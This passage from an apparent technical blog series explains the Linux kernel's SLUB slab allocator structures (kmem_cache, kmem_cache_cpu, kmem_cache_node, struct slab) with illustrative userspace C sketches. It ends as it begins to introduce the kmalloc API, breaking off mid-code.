<p><code>flags</code> holds the flags that can be set when creating a <code>kmem_cache</code> object. I won&rsquo;t go into detail, but these can be used for debugging, error handling, alignment etc. <a href="https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/slab.h#L23">[2]</a></p>
<p><a href="https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/slub_def.h#L83"><code>struct kmem_cache_order_objects</code></a> <code>oo</code> is a neat word-sized structure that simply contains one member: <code>unsigned int x</code>.</p>
<p>This is used to store both the order[3] of the slabs in this cache (in the upper bits) and the number of objects that they can contain (in the lower bits). There are then helpers to fetch either of these values (<a href="https://elixir.bootlin.com/linux/v6.0.6/source/mm/slub.c#L419"><code>oo_objects()</code></a> and <a href="https://elixir.bootlin.com/linux/v6.0.6/source/mm/slub.c#L414"><code>oo_order()</code></a>).</p>
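<p>To make the packing a bit more concrete, here&rsquo;s a minimal userspace sketch of the idea. It assumes the split sits at bit 16 (which is what I recall <code>OO_SHIFT</code> being in <code>mm/slub.c</code>); the names <code>order_objects</code>, <code>oo_pack()</code>, <code>oo_order_of()</code> and <code>oo_objects_of()</code> are made up for illustration and are not the kernel&rsquo;s own.</p>

```c
#include <assert.h>

/* Assumption: order lives above bit 16, object count in the low 16 bits. */
#define OO_SHIFT 16
#define OO_MASK  ((1u << OO_SHIFT) - 1)

/* Hypothetical stand-in for struct kmem_cache_order_objects. */
struct order_objects {
	unsigned int x;
};

/* Pack a slab order together with the number of `size` byte objects
 * that fit into (page_size << order) bytes. */
static struct order_objects oo_pack(unsigned int order, unsigned int size,
				    unsigned int page_size)
{
	struct order_objects oo;
	unsigned int objects;

	assert(size > 0);
	objects = (page_size << order) / size;
	assert(objects <= OO_MASK);	/* count must fit in the low bits */

	oo.x = (order << OO_SHIFT) + objects;
	return oo;
}

/* Upper bits: the slab order. */
static unsigned int oo_order_of(struct order_objects oo)
{
	return oo.x >> OO_SHIFT;
}

/* Lower bits: how many objects a slab of that order holds. */
static unsigned int oo_objects_of(struct order_objects oo)
{
	return oo.x & OO_MASK;
}
```

<p>For example, <code>oo_pack(1, 512, 4096)</code> describes an order 1 slab (two 4096 byte pages) holding sixteen 512 byte objects, and both values can be pulled back out of the single <code>unsigned int</code>.</p>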
<p><code>min</code> <em>I believe</em> stores the minimum <code>oo</code> counts for slabs without any debugging or extra metadata enabled. Such that when enabling those features, the kernel can compare if <code>oo</code> has increased from <code>min</code> and decide whether to still enable them if desired.</p>
<p><code>reciprocal_size</code> is, well, the reciprocal of <code>size</code>. If you also don&rsquo;t math, this is basically the properly calculated value of <code>1/size</code>. This is used by <a href="https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/slub_def.h#L179"><code>obj_to_index()</code></a> for determining the index of an object within a slab.</p>
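<p>If you&rsquo;re wondering why you&rsquo;d bother storing a reciprocal: it lets the hot path swap a division for a multiply and a couple of shifts. Below is a rough userspace sketch of that trick, modelled on my recollection of the kernel&rsquo;s reciprocal divide helpers. Treat the names (<code>recip</code>, <code>fls32()</code>, <code>recip_value()</code>, <code>recip_divide()</code>, <code>obj_index()</code>) as hypothetical and the code as an illustration rather than the kernel&rsquo;s implementation.</p>

```c
#include <assert.h>
#include <stdint.h>

/* Hypothetical stand-in for struct reciprocal_value. */
struct recip {
	uint32_t m;		/* precomputed multiplier */
	uint8_t sh1, sh2;	/* precomputed shift amounts */
};

/* 1-based index of the most significant set bit; 0 when x == 0. */
static int fls32(uint32_t x)
{
	int bits = 0;

	while (x) {
		bits++;
		x >>= 1;
	}
	return bits;
}

/* Done once per divisor (e.g. once per cache): precompute 1/d. */
static struct recip recip_value(uint32_t d)
{
	struct recip r;
	uint64_t m;
	int l;

	assert(d != 0);
	l = fls32(d - 1);	/* ceil(log2(d)) */
	m = ((1ULL << 32) * ((1ULL << l) - d)) / d + 1;
	r.m = (uint32_t)m;
	r.sh1 = (uint8_t)(l < 1 ? l : 1);
	r.sh2 = (uint8_t)(l - 1 > 0 ? l - 1 : 0);
	return r;
}

/* Computes a / d using only a multiply, an add and shifts. */
static uint32_t recip_divide(uint32_t a, struct recip r)
{
	uint32_t t = (uint32_t)(((uint64_t)a * r.m) >> 32);

	return (t + ((a - t) >> r.sh1)) >> r.sh2;
}

/* Index of the object that starts (or contains) byte offset `off`
 * within a slab whose object size has reciprocal `size_recip`. */
static uint32_t obj_index(uint32_t off, struct recip size_recip)
{
	return recip_divide(off, size_recip);
}
```

<p>So for a cache of 96 byte objects, you&rsquo;d compute <code>recip_value(96)</code> once and then <code>obj_index(192, r)</code> gives you index 2 without ever executing a divide instruction.</p>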
<p><code>list</code> is a linked list of all <code>struct kmem_cache</code> on the system and is exported as <a href="https://elixir.bootlin.com/linux/v6.0.6/source/mm/slab.h#L258"><code>slab_caches</code></a>.</p>
<p><img src="https://sam4k.com/content/images/2022/11/so_far_so_good.gif" alt=""></p>
<p>So far we&rsquo;ve covered some of the main metadata, but now we&rsquo;ll dive into some of the members involved in actually facilitating allocations.</p>
<p><code>cpu_slab</code> is a per CPU reference to a <a href="https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/slub_def.h#L48"><code>struct kmem_cache_cpu</code></a>. This means that under-the-hood this is an array of sorts and each CPU uses a different index<a href="https://lwn.net/Articles/452884/">[4]</a>, thus having a reference to a different <a href="https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/slub_def.h#L48"><code>struct kmem_cache_cpu</code></a>.</p>
<p>We&rsquo;ll touch more on this structure soon, but it represents the &ldquo;active&rdquo; slab for a given CPU. This means that any allocations made by a CPU will come from this slab (or at least this slab will be checked first!).</p>
<p><code>node[MAX_NUMNODES]</code> on the other hand is a per node reference to a <a href="https://elixir.bootlin.com/linux/v6.0.6/source/mm/slab.h#L741"><code>struct kmem_cache_node</code></a>. This structure holds information on all the other slabs (partial, full etc.) within this node and is the next port of call after <code>cpu_slab</code>.</p>
<p><code>min_partial</code> defines the minimum number of slabs to keep in a partial list, even if they&rsquo;re empty. Typically when a slab is empty, it will be freed back to the buddy allocator, unless there are <code>min_partial</code> or fewer slabs in the partial list!</p>
<p><code>offset</code> stores the &ldquo;free pointer offset&rdquo;. My educated guess is that this is the byte offset into an object where the free pointer (i.e. pointer to next free object in the slab) is found. Historically this was zero, though since 5.7 the free pointer generally lives near the middle of the object, and it can also move with debugging/flag tweaks.</p>
<p><a href="https://cateee.net/lkddb/web-lkddb/SLUB_CPU_PARTIAL.html"><code>CONFIG_SLUB_CPU_PARTIAL</code></a> enables <a href="https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/slub_def.h#L48"><code>struct kmem_cache_cpu</code></a> to not just track a per CPU &ldquo;active&rdquo; slab but also have its own per CPU partial list. After explaining the roles of <code>cpu_slab</code> and <code>node[]</code> the benefits should become clearer.</p>
<p><code>cpu_partial</code> and <code>cpu_partial_slabs</code> define the number of partial objects and partial slabs to keep around.</p>
<p><code>allocflags</code> allows a cache to define GFP flags<a href="https://www.kernel.org/doc/html/latest/core-api/memory-allocation.html">[5]</a> to apply to allocations, which can determine allocator behaviour. These can also be added through the allocation API.</p>
<p><code>ctor()</code> lets the cache define a constructor to be called on the object during <a href="https://elixir.bootlin.com/linux/v6.0.6/source/mm/slub.c#L1806"><code>setup_object()</code></a> which is called when a new slab is allocated.</p>
<p><img src="https://sam4k.com/content/images/2022/11/yes_its_over_now.gif" alt=""></p>
<p>And that&rsquo;s more or less all the key fields in <code>kmem_cache</code>! Hopefully that provided some additional context around the main structure underpinning the cache implementation, and we can dive into the next two with enough context to get along.</p>
<p>There are of course some fields I missed out, associated with debugging, mitigations or other bits and pieces, that probably didn&rsquo;t justify the bloat but that I may come back to some time.</p>
<h4 id="struct-kmemcachecpu">struct kmem_cache_cpu</h4>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-C" data-lang="C"><span class="line"><span class="cl"><span class="k">struct</span> <span class="n">kmem_cache_cpu</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">	<span class="kt">void</span> <span class="o">**</span><span class="n">freelist</span><span class="p">;</span>	<span class="cm">/* Pointer to next available object */</span>
</span></span><span class="line"><span class="cl">	<span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">tid</span><span class="p">;</span>	<span class="cm">/* Globally unique transaction id */</span>
</span></span><span class="line"><span class="cl">	<span class="k">struct</span> <span class="n">slab</span> <span class="o">*</span><span class="n">slab</span><span class="p">;</span>	<span class="cm">/* The slab from which we are allocating */</span>
</span></span><span class="line"><span class="cl"><span class="cp">#ifdef CONFIG_SLUB_CPU_PARTIAL
</span></span></span><span class="line"><span class="cl">	<span class="k">struct</span> <span class="n">slab</span> <span class="o">*</span><span class="n">partial</span><span class="p">;</span>	<span class="cm">/* Partially allocated frozen slabs */</span>
</span></span><span class="line"><span class="cl"><span class="cp">#endif
</span></span></span><span class="line"><span class="cl">	<span class="kt">local_lock_t</span> <span class="n">lock</span><span class="p">;</span>	<span class="cm">/* Protects the fields above */</span>
</span></span><span class="line"><span class="cl"><span class="cp">#ifdef CONFIG_SLUB_STATS
</span></span></span><span class="line"><span class="cl">	<span class="kt">unsigned</span> <span class="n">stat</span><span class="p">[</span><span class="n">NR_SLUB_STAT_ITEMS</span><span class="p">];</span>
</span></span><span class="line"><span class="cl"><span class="cp">#endif
</span></span></span><span class="line"><span class="cl"><span class="p">};</span>
</span></span></code></pre></div><p> <a href="https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/slub_def.h#L48">/include/linux/slub_def.h</a></p>
<p>Bet you&rsquo;re breathing a sigh of relief at that 12 liner, eh? I know I am writing this lol. Anyway, let&rsquo;s dive into <a href="https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/slub_def.h#L48"><code>struct kmem_cache_cpu</code></a>, which tracks an active slab (and partial list) for a specific CPU.</p>
<p><code>freelist</code> points to the next available (free) object in the active slab, <code>slab</code>. This is a <code>void **</code> as each free object contains a pointer to the next free object in the slab.</p>
<p><code>slab</code> points to the <a href="https://elixir.bootlin.com/linux/v6.0.6/source/mm/slab.h#L9"><code>struct slab</code></a> representing the &ldquo;active&rdquo; slab, i.e. the slab from which we&rsquo;re allocating for this CPU. We&rsquo;ll explore this more soon.</p>
<p><code>partial</code> is the per cpu partial list we mentioned earlier, when <a href="https://cateee.net/lkddb/web-lkddb/SLUB_CPU_PARTIAL.html"><code>CONFIG_SLUB_CPU_PARTIAL</code></a> is enabled (it should be on server/desktop). This points to a list of partially full <a href="https://elixir.bootlin.com/linux/v6.0.6/source/mm/slab.h#L9"><code>struct slab</code></a>.</p>
<p><img src="https://sam4k.com/content/images/2022/11/hard_time_visualising.gif" alt=""></p>
<p>u and me both</p>
<p>Okay so let&rsquo;s move away from dry member descriptions and actually look at some examples of how SLUB might serve an allocation request!</p>
<p>In this example let&rsquo;s say a kernel driver has requested to allocate a 512 byte object via the SLUB allocator API (spoiler: it&rsquo;s <code>kmalloc()</code>), from the general purpose cache for 512 byte objects, <code>kmalloc-512</code>. There&rsquo;s a couple of ways this can go down!</p>
<p>If <code>cache-&gt;cpu_slab-&gt;slab</code> has several free objects, things are fairly simple. The address of the object pointed to by <code>cache-&gt;cpu_slab-&gt;freelist</code> will be returned to the caller.</p>
<p>The <code>freelist</code> will be updated to point to the next free object in <code>cache-&gt;cpu_slab-&gt;slab</code> and relevant metadata will be updated regarding this allocation.</p>
<p><img src="https://sam4k.com/content/images/2022/11/alloc_case1-2.gif" alt=""></p>
<p>the addr of <code>new obj</code> is returned to the caller</p>
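<p>If it helps to see that fast path as code, here&rsquo;s a toy userspace model of it. This is a sketch under a bunch of assumptions: a single page sized slab, no locking, no <code>tid</code>, no hardening, and a free pointer stored at a caller chosen <code>offset</code> inside each free object. All of the names (<code>toy_cpu_slab</code>, <code>toy_slab_init()</code>, <code>toy_alloc()</code>, <code>toy_free()</code>) are hypothetical and only loosely mirror <code>struct kmem_cache_cpu</code>.</p>

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

#define SLAB_BYTES 4096	/* one page, standing in for an order 0 slab */
#define OBJ_SIZE   512	/* kmalloc-512 sized objects */

/* Toy stand-in for the per CPU "active" slab. */
struct toy_cpu_slab {
	void *freelist;			/* next free object, or NULL */
	size_t offset;			/* where the free pointer sits in an object */
	unsigned char mem[SLAB_BYTES];	/* backing memory of the slab */
};

/* Read the "next free object" pointer stored inside a free object. */
static void *get_next(const struct toy_cpu_slab *c, const void *obj)
{
	void *next;

	memcpy(&next, (const unsigned char *)obj + c->offset, sizeof(next));
	return next;
}

/* Store the "next free object" pointer inside a free object. */
static void set_next(const struct toy_cpu_slab *c, void *obj, void *next)
{
	memcpy((unsigned char *)obj + c->offset, &next, sizeof(next));
}

/* Carve the slab into objects and thread the freelist through them. */
static void toy_slab_init(struct toy_cpu_slab *c, size_t offset)
{
	size_t n = SLAB_BYTES / OBJ_SIZE;

	assert(offset + sizeof(void *) <= OBJ_SIZE);
	c->offset = offset;
	for (size_t i = 0; i < n; i++) {
		void *next = (i + 1 < n) ? c->mem + (i + 1) * OBJ_SIZE : NULL;

		set_next(c, c->mem + i * OBJ_SIZE, next);
	}
	c->freelist = c->mem;
}

/* Fast path: hand out the freelist head and advance the freelist. */
static void *toy_alloc(struct toy_cpu_slab *c)
{
	void *obj = c->freelist;

	if (!obj)
		return NULL;	/* slab exhausted; the real allocator takes a slower path here */
	c->freelist = get_next(c, obj);
	return obj;
}

/* Free: push the object back onto the head of the freelist. */
static void toy_free(struct toy_cpu_slab *c, void *obj)
{
	set_next(c, obj, c->freelist);
	c->freelist = obj;
}
```

<p>Note how a freed object goes straight back to the head of the list, so in this model the next <code>toy_alloc()</code> hands back the most recently freed object.</p>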
<p>Before we dive into other allocation scenarios, let&rsquo;s cover one more structure (sorry)!</p>
<h4 id="struct-kmemcachenode">struct kmem_cache_node</h4>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="k">struct</span> <span class="n">kmem_cache_node</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">	<span class="kt">spinlock_t</span> <span class="n">list_lock</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">	<span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">nr_partial</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="k">struct</span> <span class="n">list_head</span> <span class="n">partial</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"><span class="cp">#ifdef CONFIG_SLUB_DEBUG
</span></span></span><span class="line"><span class="cl">	<span class="kt">atomic_long_t</span> <span class="n">nr_slabs</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="kt">atomic_long_t</span> <span class="n">total_objects</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="k">struct</span> <span class="n">list_head</span> <span class="n">full</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"><span class="cp">#endif
</span></span></span><span class="line"><span class="cl"><span class="p">};</span>
</span></span></code></pre></div><p><a href="https://elixir.bootlin.com/linux/v6.0.6/source/mm/slab.h#L741">/mm/slab.h</a></p>
<p>We&rsquo;re almost there, folks! This structure tracks the partially full (<code>partial</code>) and full slabs for a particular node. We&rsquo;re talking about NUMA nodes here, which we <em>very briefly</em> touched on in the last post.</p>
<p>The tl;dr here is many CPUs can belong to one node. You can see your node information on Linux with the command <code>numactl -H</code>, which will let you know how many nodes you have and the CPUs that belong to each node!</p>
<p><code>partial</code> is a linked list of partially full <code>struct slabs</code>, the number of which is tracked by <code>nr_partial</code>. SLUB tries to keep this at or above <code>kmem_cache-&gt;min_partial</code>, as we touched on earlier.</p>
<p><code>full</code> is a linked list of full <code>struct slabs</code>. Not much else to say about that!</p>
<p><code>nr_slabs</code> is the total number of slabs tracked by this <code>kmem_cache_node</code>. Similarly, <code>total_objects</code> tracks the total number of allocated objects.</p>
<p><img src="https://sam4k.com/content/images/2022/11/let_me_show_you.gif" alt=""></p>
<p>So now we have more context about the internal SLUB structures, let&rsquo;s take what we know and apply that to a different allocation path, using the scenario from before.</p>
<p>If the <code>new obj</code> returned to the caller is the last free object in <code>cache-&gt;cpu_slab-&gt;slab</code>, the &ldquo;active&rdquo; <code>slab</code> is moved into its node&rsquo;s <code>full</code> list. The first slab from <code>cache-&gt;cpu_slab-&gt;partial</code> is then made the &ldquo;active&rdquo; <code>slab</code>.</p>
<p><img src="https://sam4k.com/content/images/2022/11/alloc_case2.gif" alt=""></p>
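<p>Here&rsquo;s a rough model of that second case, following the description above rather than the kernel source. Slabs are reduced to counters on singly linked lists, all the <code>toy_*</code> names are hypothetical, and the locking and exact timing of the real allocator are deliberately left out.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-c" data-lang="c">#include &lt;stddef.h&gt;

/* Hypothetical, heavily simplified model: a slab is just a pair of counters. */
struct toy_slab {
	unsigned int objects;	/* total objects in the slab */
	unsigned int inuse;	/* objects currently allocated */
	struct toy_slab *next;	/* link for whichever list the slab is on */
};

struct toy_cache {
	struct toy_slab *active;	/* models cache-&gt;cpu_slab-&gt;slab */
	struct toy_slab *cpu_partial;	/* models cache-&gt;cpu_slab-&gt;partial */
	struct toy_slab *node_full;	/* models the node's full list */
};

/* Allocate one object; returns the slab it came from, or NULL if nothing is left. */
struct toy_slab *toy_alloc(struct toy_cache *c)
{
	struct toy_slab *s = c-&gt;active;

	if (!s)
		return NULL;
	s-&gt;inuse++;

	if (s-&gt;inuse == s-&gt;objects) {
		/* Last free object handed out: park the slab on the full list... */
		s-&gt;next = c-&gt;node_full;
		c-&gt;node_full = s;
		/* ...and promote the first CPU partial slab to be the active slab. */
		c-&gt;active = c-&gt;cpu_partial;
		if (c-&gt;active) {
			c-&gt;cpu_partial = c-&gt;active-&gt;next;
			c-&gt;active-&gt;next = NULL;
		}
	}
	return s;
}
</code></pre></div>
<p>With an active slab that has one free object left and a single slab on the CPU partial list, one call to <code>toy_alloc()</code> moves the old active slab to <code>node_full</code> and makes the partial slab the new active one.</p>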
<p>As you can imagine, there&rsquo;s many potential allocation paths depending on the internal cache state. Similarly, there are multiple paths when an object is freed.</p>
<p>I won&rsquo;t walk through all the possible cases here, but hopefully this post provides enough details to fill in the blanks!</p>
<h4 id="struct-slab">struct slab</h4>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="k">struct</span> <span class="n">slab</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">	<span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">__page_flags</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">	<span class="k">union</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">		<span class="k">struct</span> <span class="n">list_head</span> <span class="n">slab_list</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">		<span class="k">struct</span> <span class="n">rcu_head</span> <span class="n">rcu_head</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"><span class="cp">#ifdef CONFIG_SLUB_CPU_PARTIAL
</span></span></span><span class="line"><span class="cl">		<span class="k">struct</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">			<span class="k">struct</span> <span class="n">slab</span> <span class="o">*</span><span class="n">next</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">			<span class="kt">int</span> <span class="n">slabs</span><span class="p">;</span>	<span class="cm">/* Nr of slabs left */</span>
</span></span><span class="line"><span class="cl">		<span class="p">};</span>
</span></span><span class="line"><span class="cl"><span class="cp">#endif
</span></span></span><span class="line"><span class="cl">	<span class="p">};</span>
</span></span><span class="line"><span class="cl">	<span class="k">struct</span> <span class="n">kmem_cache</span> <span class="o">*</span><span class="n">slab_cache</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="cm">/* Double-word boundary */</span>
</span></span><span class="line"><span class="cl">	<span class="kt">void</span> <span class="o">*</span><span class="n">freelist</span><span class="p">;</span>		<span class="cm">/* first free object */</span>
</span></span><span class="line"><span class="cl">	<span class="k">union</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">		<span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">counters</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">		<span class="k">struct</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">			<span class="kt">unsigned</span> <span class="nl">inuse</span><span class="p">:</span><span class="mi">16</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">			<span class="kt">unsigned</span> <span class="nl">objects</span><span class="p">:</span><span class="mi">15</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">			<span class="kt">unsigned</span> <span class="nl">frozen</span><span class="p">:</span><span class="mi">1</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">		<span class="p">};</span>
</span></span><span class="line"><span class="cl">	<span class="p">};</span>
</span></span><span class="line"><span class="cl">	<span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">__unused</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">	<span class="kt">atomic_t</span> <span class="n">__page_refcount</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"><span class="cp">#ifdef CONFIG_MEMCG
</span></span></span><span class="line"><span class="cl">	<span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">memcg_data</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"><span class="cp">#endif
</span></span></span><span class="line"><span class="cl"><span class="p">};</span>
</span></span></code></pre></div><p><a href="https://elixir.bootlin.com/linux/v6.0.6/source/mm/slab.h#L9">/mm/slab.h</a></p>
<p>Last, but certainly not least, on our SLUB struct tour is <code>struct slab</code>. This structure, unsurprisingly, represents a slab. Seems pretty straightforward, right?</p>
<p>Well, despite its benign look, <code>struct slab</code> is hiding something. It&rsquo;s actually a <code>struct page</code> in disguise. Wait, what?</p>
<p>Until recently (5.17)<a href="https://lwn.net/Articles/881039/">[6]</a>, a slab&rsquo;s metadata was accessed directly via a union in the <code>struct page</code> which represented the slab&rsquo;s memory[7].</p>
<p>That slab information <em>is still stored in</em> <code>struct page</code>, but <code>struct slab</code> was introduced as a separate view of it. This decouples the slab code from <code>struct page</code>, with the aim of moving the information out of <code>struct page</code> entirely in the future.</p>
<p><img src="https://sam4k.com/content/images/2022/11/stay_focused.gif" alt=""></p>
<p>Anyway, with that little bit of excitement out the way, let&rsquo;s see what some of these fields within <code>struct page</code>, uh I mean <code>struct slab</code> are saying!</p>
<p>The first <code>union</code> can contain several things: <code>slab_list</code>, the linked list this <code>slab</code> belongs in, e.g. the node&rsquo;s <code>full</code> list; a struct for CPU partial slabs where <code>next</code> is the next CPU partial slab and <code>slabs</code> is the number of slabs left in the CPU partial list.</p>
<p><code>slab_cache</code> is a reference to the <code>struct kmem_cache</code> this slab belongs to.</p>
<p><code>freelist</code> is a pointer to the first free object in this slab.</p>
<p>Then we have another <code>union</code>, this time used to view the same data in different ways. <code>counters</code> is used to fetch the counters within the struct easily, whereas the struct allows granular access to each of the counters: <code>inuse</code>, <code>objects</code>, <code>frozen</code>.</p>
<p><code>objects</code> is a 15-bit counter defining the total number of objects in the slab, while <code>inuse</code> is a 16-bit counter used to track the number of objects in the slab being used (i.e. have been allocated and not freed).</p>
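<p>If the &ldquo;same data, two views&rdquo; idea is new to you, this little userspace sketch mirrors the union. The <code>toy_*</code> names are mine, and the exact bit layout of bit-fields is compiler dependent, so treat the packed value as opaque rather than something to decode by hand.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-c" data-lang="c">#include &lt;string.h&gt;

/* Hypothetical mirror of the counters union in struct slab. */
union toy_counters {
	unsigned long counters;		/* all three fields viewed as one word */
	struct {
		unsigned inuse:16;	/* objects currently allocated */
		unsigned objects:15;	/* total objects in the slab */
		unsigned frozen:1;	/* slab is frozen */
	};
};

/* Build a single counters word from the individual fields. */
unsigned long toy_pack(unsigned inuse, unsigned objects, unsigned frozen)
{
	union toy_counters c;

	memset(&amp;c, 0, sizeof(c));	/* the bit-fields only cover part of the word */
	c.inuse = inuse;
	c.objects = objects;
	c.frozen = frozen;
	return c.counters;
}

/* Number of free objects described by a counters word. */
unsigned toy_free_objects(unsigned long counters)
{
	union toy_counters c;

	c.counters = counters;
	return c.objects - c.inuse;
}
</code></pre></div>
<p>For example, <code>toy_free_objects(toy_pack(3, 32, 0))</code> gives 29. The appeal of the single-word view is that all three counters can be read, compared or swapped in one go.</p>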
<p><code>frozen</code> is a boolean flag that tells SLUB whether the slab has been frozen or not. Frozen slabs are &ldquo;exempt from list management. It is not on any list except per cpu partial list. The processor that froze the slab is the one who can perform list operations on the slab&rdquo;.<a href="https://elixir.bootlin.com/linux/v6.0.6/source/mm/slub.c#L74">[8]</a></p>
<p><code>CONFIG_MEMCG</code> &ldquo;provides control over the memory footprint of tasks in a cgroup&rdquo;<a href="https://cateee.net/lkddb/web-lkddb/MEMCG.html">[9]</a>. Part of this includes accounting kernel memory for memory cgroups (memcgs)<a href="https://www.kernel.org/doc/Documentation/cgroup-v1/memory.txt">[10]</a>. Allocations made with the GFP flag <code>GFP_KERNEL_ACCOUNT</code> are accounted.</p>
<p><code>memcg_data</code> is used when accounting is enabled to store &ldquo;the object cgroups vector associated with a slab&rdquo;<a href="https://elixir.bootlin.com/linux/v6.0.6/source/mm/slab.h#L433">[11]</a>.</p>
<h4 id="wrap-up">Wrap-up</h4>
<p><img src="https://sam4k.com/content/images/2022/11/respct.gif" alt=""></p>
<p>Whew, that was quite the knowledge dump! If you read through that start-to-finish then kudos to you cos that&rsquo;s a lot to take in; hopefully it&rsquo;s not <em>too</em> dry.</p>
<p>The aim of this section was to provide a decent foundational understanding of the SLUB allocator as seen in modern Linux kernels by exploring the core data structures used in its implementation and how they fit together.</p>
<p>Next up we&rsquo;ll use this to take a look at the API and how the SLUB allocator can be used by other parts of the kernel. A bit later we&rsquo;ll also touch on some introspection, if you want to get some hands on and explore some of these data structures and stuff.</p>
<hr>
<ol>
<li><a href="https://lwn.net/Articles/881039/">https://lwn.net/Articles/881039/</a></li>
<li><a href="https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/slab.h#L23">https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/slab.h#L23</a></li>
<li>Remember page order sizes from the previous section? A 0x1000 byte slab is an order 0 slab (2<sup>0</sup> pages).</li>
<li><a href="https://lwn.net/Articles/452884/">https://lwn.net/Articles/452884/</a></li>
<li><a href="https://www.kernel.org/doc/html/latest/core-api/memory-allocation.html">https://www.kernel.org/doc/html/latest/core-api/memory-allocation.html</a></li>
<li><a href="https://lwn.net/Articles/881039/">https://lwn.net/Articles/881039/</a></li>
<li>we&rsquo;ll remember from previous posts that there is a <code>struct page</code> for every physical page of memory that the kernel manages</li>
<li><a href="https://elixir.bootlin.com/linux/v6.0.6/source/mm/slub.c#L74">https://elixir.bootlin.com/linux/v6.0.6/source/mm/slub.c#L74</a></li>
<li><a href="https://cateee.net/lkddb/web-lkddb/MEMCG.html">https://cateee.net/lkddb/web-lkddb/MEMCG.html</a></li>
<li><a href="https://www.kernel.org/doc/Documentation/cgroup-v1/memory.txt">https://www.kernel.org/doc/Documentation/cgroup-v1/memory.txt</a></li>
<li><a href="https://elixir.bootlin.com/linux/v6.0.6/source/mm/slab.h#L433">https://elixir.bootlin.com/linux/v6.0.6/source/mm/slab.h#L433</a></li>
</ol>
<h3 id="the-api">The API</h3>
<p><img src="https://sam4k.com/content/images/2022/11/here_we_go-again.gif" alt=""></p>
<p>Thought you were done with kernel code? Hah! Think again. Time to take our understanding of the kernel&rsquo;s SLUB allocator and explore its API.</p>
<p>Like all my posts, this is pretty ad hoc, so if I get excited we might take a deeper look into some of the allocator functions and have a peek at the implementation.</p>
<p>It&rsquo;s worth highlighting again that <strong>there are three slab allocator implementations</strong> in the Linux kernel: <strong>SLAB</strong>, <strong>SLUB</strong> &amp; <strong>SLOB</strong>. They share the same API, so as to abstract the implementation from the rest of the kernel.</p>
<p>As you might expect, be prepared for plenty of <code>#ifdef</code>s when perusing the source! The starting point for which is probably going to be <a href="https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/slab.h"><code>include/linux/slab.h</code></a>.</p>
<h4 id="kmalloc-kfree">kmalloc &amp; kfree</h4>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="kt">void</span> <span class="o">*</span><span class="nf">kmalloc</span><span class="p">(</span><span class="kt">size_t</span> <span class="n">size</span><span class="p">,</span> <span class="kt">gfp_t</span> <span class="n">flags</span><span class="p">)</span>
</span></span></code></pre></div><p><a href="https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/slab.h#L586">/include/linux/slab.h</a></p>
<p>The bread and butter of the slab allocator API, <code>kmalloc()</code>, as the name implies, is essentially the kernel equivalent of C&rsquo;s <code>malloc()</code>.</p>
<p>It allows a kernel developer to request a memory allocation of <code>size</code> bytes. On success the function returns a pointer to the allocated memory; on failure it returns <code>NULL</code>, which callers typically translate into an error code<a href="https://man7.org/linux/man-pages/man3/errno.3.html">[1]</a> such as <code>-ENOMEM</code>.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="k">static</span> <span class="n">__always_inline</span> <span class="nf">__alloc_size</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span> <span class="kt">void</span> <span class="o">*</span><span class="nf">kmalloc</span><span class="p">(</span><span class="kt">size_t</span> <span class="n">size</span><span class="p">,</span> <span class="kt">gfp_t</span> <span class="n">flags</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="p">{</span>
</span></span><span class="line"><span class="cl">	<span class="k">if</span> <span class="p">(</span><span class="nf">__builtin_constant_p</span><span class="p">(</span><span class="n">size</span><span class="p">))</span> <span class="p">{</span>
